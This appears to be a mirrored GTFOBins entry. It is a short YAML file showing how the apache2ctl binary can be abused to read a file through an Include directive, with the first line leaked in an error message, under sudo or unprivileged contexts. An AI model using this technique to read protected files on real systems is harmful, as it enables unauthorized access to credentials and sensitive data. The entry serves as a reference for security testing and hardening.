mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
13 lines
239 B
Plaintext
13 lines
239 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- binary: false
|
|
code: |-
|
|
apache2ctl -c 'Include /path/to/input-file'
|
|
comment: |-
|
|
The first line only is likely leaked as an error message.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|